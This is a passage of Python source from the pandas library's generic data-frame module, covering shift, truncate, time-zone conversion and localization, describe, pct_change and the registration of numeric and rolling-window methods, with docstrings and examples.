4 NaN 45.0 48.0
>>> df.shift(periods=3, fill_value=0)
Col1 Col2 Col3
0 0 0 0
1 0 0 0
2 0 0 0
3 10 13 17
4 20 23 27
"""
@Appender(_shared_docs["shift"] % _shared_doc_kwargs)
def shift(
self: FrameOrSeries, periods=1, freq=None, axis=0, fill_value=None
) -> FrameOrSeries:
if periods == 0:
return self.copy()
block_axis = self._get_block_manager_axis(axis)
if freq is None:
new_data = self._data.shift(
periods=periods, axis=block_axis, fill_value=fill_value
)
else:
return self.tshift(periods, freq)
return self._constructor(new_data).__finalize__(self)
def slice_shift(self: FrameOrSeries, periods: int = 1, axis=0) -> FrameOrSeries:
"""
Equivalent to `shift` without copying data.
The shifted data will not include the dropped periods and the
shifted axis will be smaller than the original.
Parameters
----------
periods : int
Number of periods to move, can be positive or negative.
Returns
-------
shifted : same type as caller
Notes
-----
While the `slice_shift` is faster than `shift`, you may pay for it
later during alignment.
"""
if periods == 0:
return self
if periods > 0:
vslicer = slice(None, -periods)
islicer = slice(periods, None)
else:
vslicer = slice(-periods, None)
islicer = slice(None, periods)
new_obj = self._slice(vslicer, axis=axis)
shifted_axis = self._get_axis(axis)[islicer]
new_obj.set_axis(shifted_axis, axis=axis, inplace=True)
return new_obj.__finalize__(self)
def tshift(
self: FrameOrSeries, periods: int = 1, freq=None, axis=0
) -> FrameOrSeries:
"""
Shift the time index, using the index's frequency if available.
Parameters
----------
periods : int
Number of periods to move, can be positive or negative.
freq : DateOffset, timedelta, or str, default None
Increment to use from the tseries module
or time rule expressed as a string (e.g. 'EOM').
axis : {0 or ‘index’, 1 or ‘columns’, None}, default 0
Corresponds to the axis that contains the Index.
Returns
-------
shifted : Series/DataFrame
Notes
-----
If freq is not specified then tries to use the freq or inferred_freq
attributes of the index. If neither of those attributes exist, a
ValueError is thrown
"""
index = self._get_axis(axis)
if freq is None:
freq = getattr(index, "freq", None)
if freq is None:
freq = getattr(index, "inferred_freq", None)
if freq is None:
msg = "Freq was not given and was not set in the index"
raise ValueError(msg)
if periods == 0:
return self
if isinstance(freq, str):
freq = to_offset(freq)
block_axis = self._get_block_manager_axis(axis)
if isinstance(index, PeriodIndex):
orig_freq = to_offset(index.freq)
if freq == orig_freq:
new_data = self._data.copy()
new_data.axes[block_axis] = index.shift(periods)
elif orig_freq is not None:
raise ValueError(
f"Given freq {freq.rule_code} does not match "
f"PeriodIndex freq {orig_freq.rule_code}"
)
else:
new_data = self._data.copy()
new_data.axes[block_axis] = index.shift(periods, freq)
return self._constructor(new_data).__finalize__(self)
def truncate(
self: FrameOrSeries, before=None, after=None, axis=None, copy: bool_t = True
) -> FrameOrSeries:
"""
Truncate a Series or DataFrame before and after some index value.
This is a useful shorthand for boolean indexing based on index
values above or below certain thresholds.
Parameters
----------
before : date, str, int
Truncate all rows before this index value.
after : date, str, int
Truncate all rows after this index value.
axis : {0 or 'index', 1 or 'columns'}, optional
Axis to truncate. Truncates the index (rows) by default.
copy : bool, default is True,
Return a copy of the truncated section.
Returns
-------
type of caller
The truncated Series or DataFrame.
See Also
--------
DataFrame.loc : Select a subset of a DataFrame by label.
DataFrame.iloc : Select a subset of a DataFrame by position.
Notes
-----
If the index being truncated contains only datetime values,
`before` and `after` may be specified as strings instead of
Timestamps.
Examples
--------
>>> df = pd.DataFrame({'A': ['a', 'b', 'c', 'd', 'e'],
... 'B': ['f', 'g', 'h', 'i', 'j'],
... 'C': ['k', 'l', 'm', 'n', 'o']},
... index=[1, 2, 3, 4, 5])
>>> df
A B C
1 a f k
2 b g l
3 c h m
4 d i n
5 e j o
>>> df.truncate(before=2, after=4)
A B C
2 b g l
3 c h m
4 d i n
The columns of a DataFrame can be truncated.
>>> df.truncate(before="A", after="B", axis="columns")
A B
1 a f
2 b g
3 c h
4 d i
5 e j
For Series, only rows can be truncated.
>>> df['A'].truncate(before=2, after=4)
2 b
3 c
4 d
Name: A, dtype: object
The index values in ``truncate`` can be datetimes or string
dates.
>>> dates = pd.date_range('2016-01-01', '2016-02-01', freq='s')
>>> df = pd.DataFrame(index=dates, data={'A': 1})
>>> df.tail()
A
2016-01-31 23:59:56 1
2016-01-31 23:59:57 1
2016-01-31 23:59:58 1
2016-01-31 23:59:59 1
2016-02-01 00:00:00 1
>>> df.truncate(before=pd.Timestamp('2016-01-05'),
... after=pd.Timestamp('2016-01-10')).tail()
A
2016-01-09 23:59:56 1
2016-01-09 23:59:57 1
2016-01-09 23:59:58 1
2016-01-09 23:59:59 1
2016-01-10 00:00:00 1
Because the index is a DatetimeIndex containing only dates, we can
specify `before` and `after` as strings. They will be coerced to
Timestamps before truncation.
>>> df.truncate('2016-01-05', '2016-01-10').tail()
A
2016-01-09 23:59:56 1
2016-01-09 23:59:57 1
2016-01-09 23:59:58 1
2016-01-09 23:59:59 1
2016-01-10 00:00:00 1
Note that ``truncate`` assumes a 0 value for any unspecified time
component (midnight). This differs from partial string slicing, which
returns any partially matching dates.
>>> df.loc['2016-01-05':'2016-01-10', :].tail()
A
2016-01-10 23:59:55 1
2016-01-10 23:59:56 1
2016-01-10 23:59:57 1
2016-01-10 23:59:58 1
2016-01-10 23:59:59 1
"""
if axis is None:
axis = self._stat_axis_number
axis = self._get_axis_number(axis)
ax = self._get_axis(axis)
# GH 17935
# Check that index is sorted
if not ax.is_monotonic_increasing and not ax.is_monotonic_decreasing:
raise ValueError("truncate requires a sorted index")
# if we have a date index, convert to dates, otherwise
# treat like a slice
if ax.is_all_dates:
from pandas.core.tools.datetimes import to_datetime
before = to_datetime(before)
after = to_datetime(after)
if before is not None and after is not None:
if before > after:
raise ValueError(f"Truncate: {after} must be after {before}")
slicer = [slice(None, None)] * self._AXIS_LEN
slicer[axis] = slice(before, after)
result = self.loc[tuple(slicer)]
if isinstance(ax, MultiIndex):
setattr(result, self._get_axis_name(axis), ax.truncate(before, after))
if copy:
result = result.copy()
return result
def tz_convert(
self: FrameOrSeries, tz, axis=0, level=None, copy: bool_t = True
) -> FrameOrSeries:
"""
Convert tz-aware axis to target time zone.
Parameters
----------
tz : str or tzinfo object
axis : the axis to convert
level : int, str, default None
If axis is a MultiIndex, convert a specific level. Otherwise
must be None.
copy : bool, default True
Also make a copy of the underlying data.
Returns
-------
%(klass)s
Object with time zone converted axis.
Raises
------
TypeError
If the axis is tz-naive.
"""
axis = self._get_axis_number(axis)
ax = self._get_axis(axis)
def _tz_convert(ax, tz):
if not hasattr(ax, "tz_convert"):
if len(ax) > 0:
ax_name = self._get_axis_name(axis)
raise TypeError(
f"{ax_name} is not a valid DatetimeIndex or PeriodIndex"
)
else:
ax = DatetimeIndex([], tz=tz)
else:
ax = ax.tz_convert(tz)
return ax
# if a level is given it must be a MultiIndex level or
# equivalent to the axis name
if isinstance(ax, MultiIndex):
level = ax._get_level_number(level)
new_level = _tz_convert(ax.levels[level], tz)
ax = ax.set_levels(new_level, level=level)
else:
if level not in (None, 0, ax.name):
raise ValueError(f"The level {level} is not valid")
ax = _tz_convert(ax, tz)
result = self._constructor(self._data, copy=copy)
result = result.set_axis(ax, axis=axis, inplace=False)
return result.__finalize__(self)
def tz_localize(
self: FrameOrSeries,
tz,
axis=0,
level=None,
copy: bool_t = True,
ambiguous="raise",
nonexistent: str = "raise",
) -> FrameOrSeries:
"""
Localize tz-naive index of a Series or DataFrame to target time zone.
This operation localizes the Index. To localize the values in a
timezone-naive Series, use :meth:`Series.dt.tz_localize`.
Parameters
----------
tz : str or tzinfo
axis : the axis to localize
level : int, str, default None
If axis ia a MultiIndex, localize a specific level. Otherwise
must be None.
copy : bool, default True
Also make a copy of the underlying data.
ambiguous : 'infer', bool-ndarray, 'NaT', default 'raise'
When clocks moved backward due to DST, ambiguous times may arise.
For example in Central European Time (UTC+01), when going from
03:00 DST to 02:00 non-DST, 02:30:00 local time occurs both at
00:30:00 UTC and at 01:30:00 UTC. In such a situation, the
`ambiguous` parameter dictates how ambiguous times should be
handled.
- 'infer' will attempt to infer fall dst-transition hours based on
order
- bool-ndarray where True signifies a DST time, False designates
a non-DST time (note that this flag is only applicable for
ambiguous times)
- 'NaT' will return NaT where there are ambiguous times
- 'raise' will raise an AmbiguousTimeError if there are ambiguous
times.
nonexistent : str, default 'raise'
A nonexistent time does not exist in a particular timezone
where clocks moved forward due to DST. Valid values are:
- 'shift_forward' will shift the nonexistent time forward to the
closest existing time
- 'shift_backward' will shift the nonexistent time backward to the
closest existing time
- 'NaT' will return NaT where there are nonexistent times
- timedelta objects will shift nonexistent times by the timedelta
- 'raise' will raise an NonExistentTimeError if there are
nonexistent times.
.. versionadded:: 0.24.0
Returns
-------
Series or DataFrame
Same type as the input.
Raises
------
TypeError
If the TimeSeries is tz-aware and tz is not None.
Examples
--------
Localize local times:
>>> s = pd.Series([1],
... index=pd.DatetimeIndex(['2018-09-15 01:30:00']))
>>> s.tz_localize('CET')
2018-09-15 01:30:00+02:00 1
dtype: int64
Be careful with DST changes. When there is sequential data, pandas
can infer the DST time:
>>> s = pd.Series(range(7),
... index=pd.DatetimeIndex(['2018-10-28 01:30:00',
... '2018-10-28 02:00:00',
... '2018-10-28 02:30:00',
... '2018-10-28 02:00:00',
... '2018-10-28 02:30:00',
... '2018-10-28 03:00:00',
... '2018-10-28 03:30:00']))
>>> s.tz_localize('CET', ambiguous='infer')
2018-10-28 01:30:00+02:00 0
2018-10-28 02:00:00+02:00 1
2018-10-28 02:30:00+02:00 2
2018-10-28 02:00:00+01:00 3
2018-10-28 02:30:00+01:00 4
2018-10-28 03:00:00+01:00 5
2018-10-28 03:30:00+01:00 6
dtype: int64
In some cases, inferring the DST is impossible. In such cases, you can
pass an ndarray to the ambiguous parameter to set the DST explicitly
>>> s = pd.Series(range(3),
... index=pd.DatetimeIndex(['2018-10-28 01:20:00',
... '2018-10-28 02:36:00',
... '2018-10-28 03:46:00']))
>>> s.tz_localize('CET', ambiguous=np.array([True, True, False]))
2018-10-28 01:20:00+02:00 0
2018-10-28 02:36:00+02:00 1
2018-10-28 03:46:00+01:00 2
dtype: int64
If the DST transition causes nonexistent times, you can shift these
dates forward or backwards with a timedelta object or `'shift_forward'`
or `'shift_backwards'`.
>>> s = pd.Series(range(2),
... index=pd.DatetimeIndex(['2015-03-29 02:30:00',
... '2015-03-29 03:30:00']))
>>> s.tz_localize('Europe/Warsaw', nonexistent='shift_forward')
2015-03-29 03:00:00+02:00 0
2015-03-29 03:30:00+02:00 1
dtype: int64
>>> s.tz_localize('Europe/Warsaw', nonexistent='shift_backward')
2015-03-29 01:59:59.999999999+01:00 0
2015-03-29 03:30:00+02:00 1
dtype: int64
>>> s.tz_localize('Europe/Warsaw', nonexistent=pd.Timedelta('1H'))
2015-03-29 03:30:00+02:00 0
2015-03-29 03:30:00+02:00 1
dtype: int64
"""
nonexistent_options = ("raise", "NaT", "shift_forward", "shift_backward")
if nonexistent not in nonexistent_options and not isinstance(
nonexistent, timedelta
):
raise ValueError(
"The nonexistent argument must be one of 'raise', "
"'NaT', 'shift_forward', 'shift_backward' or "
"a timedelta object"
)
axis = self._get_axis_number(axis)
ax = self._get_axis(axis)
def _tz_localize(ax, tz, ambiguous, nonexistent):
if not hasattr(ax, "tz_localize"):
if len(ax) > 0:
ax_name = self._get_axis_name(axis)
raise TypeError(
f"{ax_name} is not a valid DatetimeIndex or PeriodIndex"
)
else:
ax = DatetimeIndex([], tz=tz)
else:
ax = ax.tz_localize(tz, ambiguous=ambiguous, nonexistent=nonexistent)
return ax
# if a level is given it must be a MultiIndex level or
# equivalent to the axis name
if isinstance(ax, MultiIndex):
level = ax._get_level_number(level)
new_level = _tz_localize(ax.levels[level], tz, ambiguous, nonexistent)
ax = ax.set_levels(new_level, level=level)
else:
if level not in (None, 0, ax.name):
raise ValueError(f"The level {level} is not valid")
ax = _tz_localize(ax, tz, ambiguous, nonexistent)
result = self._constructor(self._data, copy=copy)
result = result.set_axis(ax, axis=axis, inplace=False)
return result.__finalize__(self)
# ----------------------------------------------------------------------
# Numeric Methods
def abs(self: FrameOrSeries) -> FrameOrSeries:
"""
Return a Series/DataFrame with absolute numeric value of each element.
This function only applies to elements that are all numeric.
Returns
-------
abs
Series/DataFrame containing the absolute value of each element.
See Also
--------
numpy.absolute : Calculate the absolute value element-wise.
Notes
-----
For ``complex`` inputs, ``1.2 + 1j``, the absolute value is
:math:`\\sqrt{ a^2 + b^2 }`.
Examples
--------
Absolute numeric values in a Series.
>>> s = pd.Series([-1.10, 2, -3.33, 4])
>>> s.abs()
0 1.10
1 2.00
2 3.33
3 4.00
dtype: float64
Absolute numeric values in a Series with complex numbers.
>>> s = pd.Series([1.2 + 1j])
>>> s.abs()
0 1.56205
dtype: float64
Absolute numeric values in a Series with a Timedelta element.
>>> s = pd.Series([pd.Timedelta('1 days')])
>>> s.abs()
0 1 days
dtype: timedelta64[ns]
Select rows with data closest to certain value using argsort (from
`StackOverflow <https://stackoverflow.com/a/17758115>`__).
>>> df = pd.DataFrame({
... 'a': [4, 5, 6, 7],
... 'b': [10, 20, 30, 40],
... 'c': [100, 50, -30, -50]
... })
>>> df
a b c
0 4 10 100
1 5 20 50
2 6 30 -30
3 7 40 -50
>>> df.loc[(df.c - 43).abs().argsort()]
a b c
1 5 20 50
0 4 10 100
2 6 30 -30
3 7 40 -50
"""
return np.abs(self)
def describe(
self: FrameOrSeries, percentiles=None, include=None, exclude=None
) -> FrameOrSeries:
"""
Generate descriptive statistics.
Descriptive statistics include those that summarize the central
tendency, dispersion and shape of a
dataset's distribution, excluding ``NaN`` values.
Analyzes both numeric and object series, as well
as ``DataFrame`` column sets of mixed data types. The output
will vary depending on what is provided. Refer to the notes
below for more detail.
Parameters
----------
percentiles : list-like of numbers, optional
The percentiles to include in the output. All should
fall between 0 and 1. The default is
``[.25, .5, .75]``, which returns the 25th, 50th, and
75th percentiles.
include : 'all', list-like of dtypes or None (default), optional
A white list of data types to include in the result. Ignored
for ``Series``. Here are the options:
- 'all' : All columns of the input will be included in the output.
- A list-like of dtypes : Limits the results to the
provided data types.
To limit the result to numeric types submit
``numpy.number``. To limit it instead to object columns submit
the ``numpy.object`` data type. Strings
can also be used in the style of
``select_dtypes`` (e.g. ``df.describe(include=['O'])``). To
select pandas categorical columns, use ``'category'``
- None (default) : The result will include all numeric columns.
exclude : list-like of dtypes or None (default), optional,
A black list of data types to omit from the result. Ignored
for ``Series``. Here are the options:
- A list-like of dtypes : Excludes the provided data types
from the result. To exclude numeric types submit
``numpy.number``. To exclude object columns submit the data
type ``numpy.object``. Strings can also be used in the style of
``select_dtypes`` (e.g. ``df.describe(include=['O'])``). To
exclude pandas categorical columns, use ``'category'``
- None (default) : The result will exclude nothing.
Returns
-------
Series or DataFrame
Summary statistics of the Series or Dataframe provided.
See Also
--------
DataFrame.count: Count number of non-NA/null observations.
DataFrame.max: Maximum of the values in the object.
DataFrame.min: Minimum of the values in the object.
DataFrame.mean: Mean of the values.
DataFrame.std: Standard deviation of the observations.
DataFrame.select_dtypes: Subset of a DataFrame including/excluding
columns based on their dtype.
Notes
-----
For numeric data, the result's index will include ``count``,
``mean``, ``std``, ``min``, ``max`` as well as lower, ``50`` and
upper percentiles. By default the lower percentile is ``25`` and the
upper percentile is ``75``. The ``50`` percentile is the
same as the median.
For object data (e.g. strings or timestamps), the result's index
will include ``count``, ``unique``, ``top``, and ``freq``. The ``top``
is the most common value. The ``freq`` is the most common value's
frequency. Timestamps also include the ``first`` and ``last`` items.
If multiple object values have the highest count, then the
``count`` and ``top`` results will be arbitrarily chosen from
among those with the highest count.
For mixed data types provided via a ``DataFrame``, the default is to
return only an analysis of numeric columns. If the dataframe consists
only of object and categorical data without any numeric columns, the
default is to return an analysis of both the object and categorical
columns. If ``include='all'`` is provided as an option, the result
will include a union of attributes of each type.
The `include` and `exclude` parameters can be used to limit
which columns in a ``DataFrame`` are analyzed for the output.
The parameters are ignored when analyzing a ``Series``.
Examples
--------
Describing a numeric ``Series``.
>>> s = pd.Series([1, 2, 3])
>>> s.describe()
count 3.0
mean 2.0
std 1.0
min 1.0
25% 1.5
50% 2.0
75% 2.5
max 3.0
dtype: float64
Describing a categorical ``Series``.
>>> s = pd.Series(['a', 'a', 'b', 'c'])
>>> s.describe()
count 4
unique 3
top a
freq 2
dtype: object
Describing a timestamp ``Series``.
>>> s = pd.Series([
... np.datetime64("2000-01-01"),
... np.datetime64("2010-01-01"),
... np.datetime64("2010-01-01")
... ])
>>> s.describe()
count 3
unique 2
top 2010-01-01 00:00:00
freq 2
first 2000-01-01 00:00:00
last 2010-01-01 00:00:00
dtype: object
Describing a ``DataFrame``. By default only numeric fields
are returned.
>>> df = pd.DataFrame({'categorical': pd.Categorical(['d','e','f']),
... 'numeric': [1, 2, 3],
... 'object': ['a', 'b', 'c']
... })
>>> df.describe()
numeric
count 3.0
mean 2.0
std 1.0
min 1.0
25% 1.5
50% 2.0
75% 2.5
max 3.0
Describing all columns of a ``DataFrame`` regardless of data type.
>>> df.describe(include='all')
categorical numeric object
count 3 3.0 3
unique 3 NaN 3
top f NaN c
freq 1 NaN 1
mean NaN 2.0 NaN
std NaN 1.0 NaN
min NaN 1.0 NaN
25% NaN 1.5 NaN
50% NaN 2.0 NaN
75% NaN 2.5 NaN
max NaN 3.0 NaN
Describing a column from a ``DataFrame`` by accessing it as
an attribute.
>>> df.numeric.describe()
count 3.0
mean 2.0
std 1.0
min 1.0
25% 1.5
50% 2.0
75% 2.5
max 3.0
Name: numeric, dtype: float64
Including only numeric columns in a ``DataFrame`` description.
>>> df.describe(include=[np.number])
numeric
count 3.0
mean 2.0
std 1.0
min 1.0
25% 1.5
50% 2.0
75% 2.5
max 3.0
Including only string columns in a ``DataFrame`` description.
>>> df.describe(include=[np.object])
object
count 3
unique 3
top c
freq 1
Including only categorical columns from a ``DataFrame`` description.
>>> df.describe(include=['category'])
categorical
count 3
unique 3
top f
freq 1
Excluding numeric columns from a ``DataFrame`` description.
>>> df.describe(exclude=[np.number])
categorical object
count 3 3
unique 3 3
top f c
freq 1 1
Excluding object columns from a ``DataFrame`` description.
>>> df.describe(exclude=[np.object])
categorical numeric
count 3 3.0
unique 3 NaN
top f NaN
freq 1 NaN
mean NaN 2.0
std NaN 1.0
min NaN 1.0
25% NaN 1.5
50% NaN 2.0
75% NaN 2.5
max NaN 3.0
"""
if self.ndim == 2 and self.columns.size == 0:
raise ValueError("Cannot describe a DataFrame without columns")
if percentiles is not None:
# explicit conversion of `percentiles` to list
percentiles = list(percentiles)
# get them all to be in [0, 1]
validate_percentile(percentiles)
# median should always be included
if 0.5 not in percentiles:
percentiles.append(0.5)
percentiles = np.asarray(percentiles)
else:
percentiles = np.array([0.25, 0.5, 0.75])
# sort and check for duplicates
unique_pcts = np.unique(percentiles)
if len(unique_pcts) < len(percentiles):
raise ValueError("percentiles cannot contain duplicates")
percentiles = unique_pcts
formatted_percentiles = format_percentiles(percentiles)
def describe_numeric_1d(series):
stat_index = (
["count", "mean", "std", "min"] + formatted_percentiles + ["max"]
)
d = (
[series.count(), series.mean(), series.std(), series.min()]
+ series.quantile(percentiles).tolist()
+ [series.max()]
)
return pd.Series(d, index=stat_index, name=series.name)
def describe_categorical_1d(data):
names = ["count", "unique"]
objcounts = data.value_counts()
count_unique = len(objcounts[objcounts != 0])
result = [data.count(), count_unique]
dtype = None
if result[1] > 0:
top, freq = objcounts.index[0], objcounts.iloc[0]
names += ["top", "freq"]
result += [top, freq]
# If the DataFrame is empty, set 'top' and 'freq' to None
# to maintain output shape consistency
else:
names += ["top", "freq"]
result += [np.nan, np.nan]
dtype = "object"
return pd.Series(result, index=names, name=data.name, dtype=dtype)
def describe_timestamp_1d(data):
# GH-30164
stat_index = ["count", "mean", "min"] + formatted_percentiles + ["max"]
d = (
[data.count(), data.mean(), data.min()]
+ data.quantile(percentiles).tolist()
+ [data.max()]
)
return pd.Series(d, index=stat_index, name=data.name)
def describe_1d(data):
if is_bool_dtype(data):
return describe_categorical_1d(data)
elif is_numeric_dtype(data):
return describe_numeric_1d(data)
elif is_datetime64_any_dtype(data):
return describe_timestamp_1d(data)
elif is_timedelta64_dtype(data):
return describe_numeric_1d(data)
else:
return describe_categorical_1d(data)
if self.ndim == 1:
return describe_1d(self)
elif (include is None) and (exclude is None):
# when some numerics are found, keep only numerics
data = self.select_dtypes(include=[np.number])
if len(data.columns) == 0:
data = self
elif include == "all":
if exclude is not None:
msg = "exclude must be None when include is 'all'"
raise ValueError(msg)
data = self
else:
data = self.select_dtypes(include=include, exclude=exclude)
ldesc = [describe_1d(s) for _, s in data.items()]
# set a convenient order for rows
names: List[Optional[Hashable]] = []
ldesc_indexes = sorted((x.index for x in ldesc), key=len)
for idxnames in ldesc_indexes:
for name in idxnames:
if name not in names:
names.append(name)
d = pd.concat([x.reindex(names, copy=False) for x in ldesc], axis=1, sort=False)
d.columns = data.columns.copy()
return d
_shared_docs[
"pct_change"
] = """
Percentage change between the current and a prior element.
Computes the percentage change from the immediately previous row by
default. This is useful in comparing the percentage of change in a time
series of elements.
Parameters
----------
periods : int, default 1
Periods to shift for forming percent change.
fill_method : str, default 'pad'
How to handle NAs before computing percent changes.
limit : int, default None
The number of consecutive NAs to fill before stopping.
freq : DateOffset, timedelta, or str, optional
Increment to use from time series API (e.g. 'M' or BDay()).
**kwargs
Additional keyword arguments are passed into
`DataFrame.shift` or `Series.shift`.
Returns
-------
chg : Series or DataFrame
The same type as the calling object.
See Also
--------
Series.diff : Compute the difference of two elements in a Series.
DataFrame.diff : Compute the difference of two elements in a DataFrame.
Series.shift : Shift the index by some number of periods.
DataFrame.shift : Shift the index by some number of periods.
Examples
--------
**Series**
>>> s = pd.Series([90, 91, 85])
>>> s
0 90
1 91
2 85
dtype: int64
>>> s.pct_change()
0 NaN
1 0.011111
2 -0.065934
dtype: float64
>>> s.pct_change(periods=2)
0 NaN
1 NaN
2 -0.055556
dtype: float64
See the percentage change in a Series where filling NAs with last
valid observation forward to next valid.
>>> s = pd.Series([90, 91, None, 85])
>>> s
0 90.0
1 91.0
2 NaN
3 85.0
dtype: float64
>>> s.pct_change(fill_method='ffill')
0 NaN
1 0.011111
2 0.000000
3 -0.065934
dtype: float64
**DataFrame**
Percentage change in French franc, Deutsche Mark, and Italian lira from
1980-01-01 to 1980-03-01.
>>> df = pd.DataFrame({
... 'FR': [4.0405, 4.0963, 4.3149],
... 'GR': [1.7246, 1.7482, 1.8519],
... 'IT': [804.74, 810.01, 860.13]},
... index=['1980-01-01', '1980-02-01', '1980-03-01'])
>>> df
FR GR IT
1980-01-01 4.0405 1.7246 804.74
1980-02-01 4.0963 1.7482 810.01
1980-03-01 4.3149 1.8519 860.13
>>> df.pct_change()
FR GR IT
1980-01-01 NaN NaN NaN
1980-02-01 0.013810 0.013684 0.006549
1980-03-01 0.053365 0.059318 0.061876
Percentage of change in GOOG and APPL stock volume. Shows computing
the percentage change between columns.
>>> df = pd.DataFrame({
... '2016': [1769950, 30586265],
... '2015': [1500923, 40912316],
... '2014': [1371819, 41403351]},
... index=['GOOG', 'APPL'])
>>> df
2016 2015 2014
GOOG 1769950 1500923 1371819
APPL 30586265 40912316 41403351
>>> df.pct_change(axis='columns')
2016 2015 2014
GOOG NaN -0.151997 -0.086016
APPL NaN 0.337604 0.012002
"""
@Appender(_shared_docs["pct_change"] % _shared_doc_kwargs)
def pct_change(
self: FrameOrSeries,
periods=1,
fill_method="pad",
limit=None,
freq=None,
**kwargs,
) -> FrameOrSeries:
# TODO: Not sure if above is correct - need someone to confirm.
axis = self._get_axis_number(kwargs.pop("axis", self._stat_axis_name))
if fill_method is None:
data = self
else:
data = self._ensure_type(
self.fillna(method=fill_method, axis=axis, limit=limit)
)
rs = data.div(data.shift(periods=periods, freq=freq, axis=axis, **kwargs)) - 1
if freq is not None:
# Shift method is implemented differently when freq is not None
# We want to restore the original index
rs = rs.loc[~rs.index.duplicated()]
rs = rs.reindex_like(data)
return rs
def _agg_by_level(self, name, axis=0, level=0, skipna=True, **kwargs):
if axis is None:
raise ValueError("Must specify 'axis' when aggregating by level.")
grouped = self.groupby(level=level, axis=axis, sort=False)
if hasattr(grouped, name) and skipna:
return getattr(grouped, name)(**kwargs)
axis = self._get_axis_number(axis)
method = getattr(type(self), name)
applyf = lambda x: method(x, axis=axis, skipna=skipna, **kwargs)
return grouped.aggregate(applyf)
@classmethod
def _add_numeric_operations(cls):
"""
Add the operations to the cls; evaluate the doc strings again
"""
axis_descr, name, name2 = _doc_parms(cls)
cls.any = _make_logical_function(
cls,
"any",
name,
name2,
axis_descr,
_any_desc,
nanops.nanany,
_any_see_also,
_any_examples,
empty_value=False,
)
cls.all = _make_logical_function(
cls,
"all",
name,
name2,
axis_descr,
_all_desc,
nanops.nanall,
_all_see_also,
_all_examples,
empty_value=True,
)
@Substitution(
desc="Return the mean absolute deviation of the values "
"for the requested axis.",
name1=name,
name2=name2,
axis_descr=axis_descr,
min_count="",
see_also="",
examples="",
)
@Appender(_num_doc_mad)
def mad(self, axis=None, skipna=None, level=None):
if skipna is None:
skipna = True
if axis is None:
axis = self._stat_axis_number
if level is not None:
return self._agg_by_level("mad", axis=axis, level=level, skipna=skipna)
data = self._get_numeric_data()
if axis == 0:
demeaned = data - data.mean(axis=0)
else:
demeaned = data.sub(data.mean(axis=1), axis=0)
return np.abs(demeaned).mean(axis=axis, skipna=skipna)
cls.mad = mad
cls.sem = _make_stat_function_ddof(
cls,
"sem",
name,
name2,
axis_descr,
"Return unbiased standard error of the mean over requested "
"axis.\n\nNormalized by N-1 by default. This can be changed "
"using the ddof argument",
nanops.nansem,
)
cls.var = _make_stat_function_ddof(
cls,
"var",
name,
name2,
axis_descr,
"Return unbiased variance over requested axis.\n\nNormalized by "
"N-1 by default. This can be changed using the ddof argument",
nanops.nanvar,
)
cls.std = _make_stat_function_ddof(
cls,
"std",
name,
name2,
axis_descr,
"Return sample standard deviation over requested axis."
"\n\nNormalized by N-1 by default. This can be changed using the "
"ddof argument",
nanops.nanstd,
)
cls.cummin = _make_cum_function(
cls,
"cummin",
name,
name2,
axis_descr,
"minimum",
np.minimum.accumulate,
"min",
np.inf,
np.nan,
_cummin_examples,
)
cls.cumsum = _make_cum_function(
cls,
"cumsum",
name,
name2,
axis_descr,
"sum",
np.cumsum,
"sum",
0.0,
np.nan,
_cumsum_examples,
)
cls.cumprod = _make_cum_function(
cls,
"cumprod",
name,
name2,
axis_descr,
"product",
np.cumprod,
"prod",
1.0,
np.nan,
_cumprod_examples,
)
cls.cummax = _make_cum_function(
cls,
"cummax",
name,
name2,
axis_descr,
"maximum",
np.maximum.accumulate,
"max",
-np.inf,
np.nan,
_cummax_examples,
)
cls.sum = _make_min_count_stat_function(
cls,
"sum",
name,
name2,
axis_descr,
"""Return the sum of the values for the requested axis.\n
This is equivalent to the method ``numpy.sum``.""",
nanops.nansum,
_stat_func_see_also,
_sum_examples,
)
cls.mean = _make_stat_function(
cls,
"mean",
name,
name2,
axis_descr,
"Return the mean of the values for the requested axis.",
nanops.nanmean,
)
cls.skew = _make_stat_function(
cls,
"skew",
name,
name2,
axis_descr,
"Return unbiased skew over requested axis.\n\nNormalized by N-1.",
nanops.nanskew,
)
cls.kurt = _make_stat_function(
cls,
"kurt",
name,
name2,
axis_descr,
"Return unbiased kurtosis over requested axis.\n\n"
"Kurtosis obtained using Fisher's definition of\n"
"kurtosis (kurtosis of normal == 0.0). Normalized "
"by N-1.",
nanops.nankurt,
)
cls.kurtosis = cls.kurt
cls.prod = _make_min_count_stat_function(
cls,
"prod",
name,
name2,
axis_descr,
"Return the product of the values for the requested axis.",
nanops.nanprod,
examples=_prod_examples,
)
cls.product = cls.prod
cls.median = _make_stat_function(
cls,
"median",
name,
name2,
axis_descr,
"Return the median of the values for the requested axis.",
nanops.nanmedian,
)
cls.max = _make_stat_function(
cls,
"max",
name,
name2,
axis_descr,
"""Return the maximum of the values for the requested axis.\n
If you want the *index* of the maximum, use ``idxmax``. This is
the equivalent of the ``numpy.ndarray`` method ``argmax``.""",
nanops.nanmax,
_stat_func_see_also,
_max_examples,
)
cls.min = _make_stat_function(
cls,
"min",
name,
name2,
axis_descr,
"""Return the minimum of the values for the requested axis.\n
If you want the *index* of the minimum, use ``idxmin``. This is
the equivalent of the ``numpy.ndarray`` method ``argmin``.""",
nanops.nanmin,
_stat_func_see_also,
_min_examples,
)
@classmethod
def _add_series_or_dataframe_operations(cls):
"""
Add the series or dataframe only operations to the cls; evaluate
the doc strings again.
"""
from pandas.core.window import EWM, Expanding, Rolling, Window
@Appender(Rolling.__doc__)
def rolling(
self,
window,
min_periods=None,
center=False,
win_type=None,
on=None,
axis=0,
closed=None,
):
axis = self._get_axis_number(axis)
if win_type is not None:
return Window(
self,
window=window,
min_periods=min_periods,
center=center,
win_type=win_type,
on=on,
axis=axis,
closed=closed,
)
return Rolling(
self,
window=window,
min_periods=min_periods,
center=center,
win_type=win_type,
on=on,
axis=axis,
closed=closed,
)
cls.rolling = rolling
@Appender(Expanding.__doc__)
def expanding(self, min_periods=1, center=False, axis=0):
axis = self._get_axis_number(axis)
return Expanding(self, min_periods=min_periods, center=center, axis=axis)
cls.expanding = expanding
@Appender(EWM.__doc__)
def ewm(
self,
com=None,
span=None,
halflife=None,
alpha=None,
min_periods=0,
adjust=True,
ignore_na=False,
axis=0,
):
axis = self._get_axis_number(axis)
return EWM(
self,
com=com,
span=span,
halflife=halflife,
alpha=alpha,
min_periods=min_periods,
adjust=adjust,
ignore_na=ignore_na,
axis=axis,
)
cls.ewm = ewm
@Appender(_shared_docs["transform"] % dict(axis="", **_shared_doc_kwargs))
def transform(self, func, *args, **kwargs):
result = self.agg(func, *args, **kwargs)
if is_scalar(result) or len(result) != len(self):
raise ValueError("transforms cannot produce aggregated results")
return result
